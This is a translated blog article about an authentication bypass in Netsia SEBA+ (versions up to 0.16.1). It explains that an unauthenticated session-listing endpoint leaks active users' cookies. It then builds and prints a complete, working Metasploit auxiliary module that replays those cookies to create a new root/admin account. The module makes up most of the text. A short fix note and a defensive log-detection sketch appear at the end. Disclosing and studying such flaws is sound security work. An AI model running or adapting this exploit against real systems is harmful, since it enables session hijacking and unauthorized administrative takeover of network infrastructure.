
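An Example Analysis of the Netsia-SEBA Authentication Bypass Vulnerability

Published: 2021-12-28 10:43:35  Source: 億速云  Views: 150  Author: 小新  Category: Security Technology

This article walks through an example analysis of the Netsia-SEBA authentication bypass vulnerability. Most readers are probably not yet familiar with it, so it is shared here for reference.

Vulnerability Analysis

Unfortunately, because I do not have access to the product's source code, I cannot describe the root cause of the vulnerability in detail.

In the application, HTTP requests to the "Active Sessions" section, which is meant to be accessed by root/admin users, can be made without any session (cookie) information. As a result, the session cookie values of the application's active users can be read from the response.

Note that similar requests cannot be sent anywhere else in the application. In other words, "Active Sessions" is the only place where such a request is accepted without session information.

By issuing a "GET /session/list/allActiveSession" request, we can obtain an authorized user's cookie value from the session information returned in the response.

At this point we hold a cookie value, but the session may well end at any moment. The best attack vector is therefore to create a new user.

We can therefore add a new root user to the application by sending the required data in a "POST /authentication-server/user/add" request.

In this attack, after obtaining a logged-in user's cookie value, an unauthorized attacker can create a new user with full privileges by placing that cookie value in the user-add request.

The HTTP response indicates that the requested user was added successfully. The attacker can later log in to the application as this fully privileged user and perform all other operations.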

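Advanced Exploit Development (MSF: Auxiliary)

About Auxiliary Modules

The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing (vulnerability checks), sniffing and more. Although these modules will not give you a shell, they are very valuable during a penetration test. "show auxiliary" lists all auxiliary modules.

Exploit modules are usually written to execute commands on a system, whereas MSF auxiliary modules suit many common kinds of vulnerability, such as retrieving information from the target host or using an existing vulnerability on the target to create a new attack vector.

We can therefore use an MSF auxiliary module to build the exploit for this vulnerability.

class MetasploitModule < Msf::Auxiliary

No payload is generated here, because we did not choose Msf::Exploit::Remote.

Next, we register the username and password as options. The Rex::Text.rand_text_alphanumeric() function generates a random default value for the password, which makes the exploit more convenient to use.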

register_options(
  [
    Opt::RPORT(443),
    OptString.new('USERNAME', [true, 'The username for your new account']),
    OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
  ])

Next, request "/session/list/allActiveSession" and check the response. If the response contains "sessionId", an active session exists. If there is no "sessionId" but the response contains "SUCCESS", the application is vulnerable but has no active session.

def check
  begin
    # Request the active-session list without sending any cookie
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
    )
  rescue
    return Exploit::CheckCode::Unknown
  end

  # A sessionId in the body means the list was served and a session is active
  if res.code == 200 and res.body.include? 'sessionId'
    return Exploit::CheckCode::Vulnerable
  else
    # The list was served, but it contains no active session
    if res.code == 200 and res.body.include? 'SUCCESS'
      print_status("Target is vulnerable! But active admin session was not found. Try again later.")
      return Exploit::CheckCode::Appears
    end
  end

  return Exploit::CheckCode::Safe
end

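The check method above is sufficient for this step. The auxiliary module does not need to run anything further, because if the target is not vulnerable there is no point in performing the remaining operations.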

unless Exploit::CheckCode::Vulnerable == check
  fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end

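Next, we can start writing the exploit code.

First, we need to know how many active sessions exist in the Netsia SEBA+ application. Several users can be active at once, some of whom may not be authorized users, and we need the active user with the highest privileges for the attack. I therefore decided to create a separate counting method.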

def count_user(data, find_string)
  # Count occurrences of find_string using a zero-width lookahead
  data.scan(/(?=#{find_string})/).count
end

We pass the HTTP response as the data and search for the string "sessionId". The number of "sessionId" occurrences in the response equals the number of active users; later we also need to extract these sessionId values.

res = send_request_cgi(
  'method' => 'GET',
  'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")

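That completes the first step. Next, we need to extract the sessionId values.

The part between `"sessionId":"` and `","action` is the sessionId value in the response. We can use the scan() function with the regular expression ([\S\s]*?) to capture it.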

cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)

In the result, cookies[0] is the first user's sessionId value and cookies[1] is the second user's, with the index increasing by 1 each time.

Now we will apply a very simple vector for the exploit.

We will send a user-creation request with each of the active cookie values; whichever of these cookies belongs to an authorized user, the request will create the new user we want in the user database.

Here I chose a while loop. For example, with 7 active users, the loop increments the index into cookies[int] by 1 each time and issues every possible request.

while $i <= sescount  do
  sessloop = cookies[$i]
  sessid = "SESSION=" + sessloop.to_s
  cookie = sessid.split('"]').join('').split('["').join('')
  $i +=1
  json_data=[........]

  res = send_request_raw({
    'method' => 'POST',
    'ctype'  => 'application/json',
    'uri'    => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
    'cookie' => cookie,
    'data'   => json_data
  })

end

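A loop like the one above is enough for this vector. Finally, we need to check whether the request succeeded.

If the desired user was created, the module reports this and prints the newly created user's details.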

if res.code == 200 and res.body.include? '"SUCCESS"'
  print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
  print_good("Username : #{datastore["USERNAME"]}")
  print_good("Password : #{datastore["PASSWORD"]}")
  break
end

Exploitation in Practice

The auxiliary module is now complete. Next, we put everything together:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
      'Description'    => %q{
        This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
        HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
        can be performed without the need for any session(cookie) information.
        Therefore, the session cookie informations of the active users in the application can be read from the response content.
        A new authorized user can be created with the obtained cookie.
      },
      'References'     =>
        [
          [ 'CVE', '' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
          [ 'URL', 'https://www.netsia.com' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "2021-01-06",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'The username for your new account']),
        OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
      ])
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def check
    begin
    res = send_request_cgi(
          'method'  => 'GET',
          'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
          )

    rescue
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.body.include? 'sessionId'
      return Exploit::CheckCode::Vulnerable
    else
       if res.code == 200 and res.body.include? 'SUCCESS'
         print_status("Target is vulnerable! But active admin session was not found. Try again later.")
         return Exploit::CheckCode::Appears
       end
    end

    return Exploit::CheckCode::Safe
  end

  def count_user(data, find_string)
    data.scan(/(?=#{find_string})/).count
  end

  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    res = send_request_cgi(
          'method'  => 'GET',
          'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
          )
    sescount = count_user(res.body,'"name"')
    print_good("Currently #{sescount} active sessions have been detected.")

    cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
    puts cookies
    $i = 0

    while $i <= sescount  do
       sessloop = cookies[$i]
       sessid = "SESSION=" + sessloop.to_s
       cookie = sessid.split('"]').join('').split('["').join('')
       $i +=1

       json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": 
"edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", 
"/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", 
"/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], 
"perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": 
"onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}'

 

       res = send_request_raw({
                'method' => 'POST',
                'ctype'  => 'application/json',
                'uri'    => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
                'cookie' => cookie,
                'data'   => json_data
               })

       if res.code == 200 and res.body.include? '"SUCCESS"'
         print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
         print_good("Username : #{datastore["USERNAME"]}")
         print_good("Password : #{datastore["PASSWORD"]}")
         break
       end
     end
  end
end

Next, we can use the auxiliary module to carry out the exploitation.

Vulnerability Fix

Netsia has now fixed this vulnerability: the request can no longer be sent without an authorized cookie. Even an authorized administrator will see that the session cookies are filtered out of the response.
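A detection sketch for the request sequence described in this article, added here as an example and not part of the original post or of Netsia's software: it scans access-log lines for a cookie-less request to /session/list/allActiveSession that was answered with 200, and correlates it with a later POST to /authentication-server/user/add from the same client. The log format (including the trailing session=yes|no field), the 600-second window and every sample line are assumptions constructed for illustration.

```ruby
require 'time'

# Assumed log format (constructed for this example), one request per line:
#   <client_ip> <ISO-8601 time> <method> <path> <status> session=<yes|no>
# "session" records whether the request carried a SESSION cookie.
LINE_RE   = %r{\A(\S+) (\S+) (GET|POST) (\S+) (\d{3}) session=(yes|no)\z}
LIST_PATH = '/session/list/allActiveSession'
ADD_PATH  = '/authentication-server/user/add'
WINDOW    = 600 # seconds allowed between session listing and user creation

Event = Struct.new(:ip, :time, :verb, :path, :status, :has_session)

# Parse one log line into an Event; returns nil for lines that do not match.
def parse_line(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  path = m[4][/\A[^?]*/] # drop any query string
  Event.new(m[1], Time.iso8601(m[2]), m[3], path, m[5].to_i, m[6] == 'yes')
rescue ArgumentError
  nil # unparsable timestamp
end

# A "leak" is a session listing answered with 200 although no cookie was sent.
def leak?(event)
  event.verb == 'GET' && event.path.end_with?(LIST_PATH) &&
    event.status == 200 && !event.has_session
end

# One finding per client: the leak, plus any user-add POST that followed it.
def detect(lines)
  events = lines.map { |l| parse_line(l) }.compact.sort_by(&:time)
  events.select { |e| leak?(e) }.group_by(&:ip).map do |ip, leaks|
    follow = events.find do |e|
      e.ip == ip && e.verb == 'POST' && e.path.end_with?(ADD_PATH) &&
        leaks.any? { |l| e.time >= l.time && e.time - l.time <= WINDOW }
    end
    severity = if follow.nil? then :session_list_exposed
               elsif follow.status == 200 then :user_add_succeeded
               else :user_add_attempted
               end
    { ip: ip, first_seen: leaks.first.time, list_requests: leaks.size,
      severity: severity }
  end
end

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = <<~LOG.lines
  198.51.100.7 2021-01-06T10:00:01Z GET /session/list/allActiveSession 200 session=yes
  192.0.2.44 2021-01-06T10:05:10Z GET /session/list/allActiveSession 200 session=no
  192.0.2.44 2021-01-06T10:05:11Z GET /session/list/allActiveSession 200 session=no
  192.0.2.44 2021-01-06T10:05:12Z POST /authentication-server/user/add 200 session=yes
  203.0.113.9 2021-01-06T11:00:00Z GET /session/list/allActiveSession 401 session=no
  203.0.113.20 2021-01-06T12:00:00Z GET /session/list/allActiveSession 200 session=no
  malformed line
LOG

detect(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

The user-add request itself carries a valid cookie, so on its own it looks like normal administrator activity; the preceding cookie-less listing is what makes the sequence stand out. Because the fixed version no longer serves that request without an authorized cookie, a finding on a patched deployment is worth investigating as a regression.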
